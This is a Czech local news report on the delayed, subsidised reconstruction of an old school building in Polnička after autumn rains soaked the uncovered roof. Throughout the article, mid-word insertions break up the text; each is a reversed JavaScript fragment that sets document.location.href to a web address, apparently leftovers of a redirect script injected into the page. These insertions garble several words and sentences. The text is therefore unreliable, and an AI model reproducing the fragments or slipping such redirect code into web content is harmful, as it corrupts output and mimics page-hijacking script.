Rainbow page separator

Rekonstrukci školní budovy zkomplikovaly podzimní deště

Neděle, 3. ledna 2021

Polnička / O prodloužení čerpání dotace na rekonstrukci staré školní budovy požádali polničští zastupitelé. Vlivem silných podzimních dešťů v době, kdy byla podle harmonogramu stavebních prací odstraněna původní střecha, i přes zabezpečení odkrytých částí a potažení plach[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou došlo k zatečení vody nejprve do půdní části a následně i do dalšího pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru objektu, což si vyžádalo nápravu. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos dojde k zateplení západní strany budovy včetně nutného posunutí původního komína. Výměna čeká také vodovodní a elektrické rozvody, stropní podhledy, podlahy či sociální zařízení, počítá se také s novým vybavením. Rekonstrukce staré školní budovy byla vyčíslena na 23,9 milionu korun, příslib dotace činí dvacet milionů. Dotační podporu bylo původně nutné proinves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat do května, práce začaly v druhé polovině letních prázdnin. Budova, která prochází poslední fází oprav, nejdříve bývala sídlem železáren. Po přestavbě na školu došlo k jejímu zprovoznění v roce 1891. Objekt tehdy obci věnovala hraběnka Gallasová, která přestavbu zároveň finančně podpořila.

zdroj fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: www.zspolnicka.cz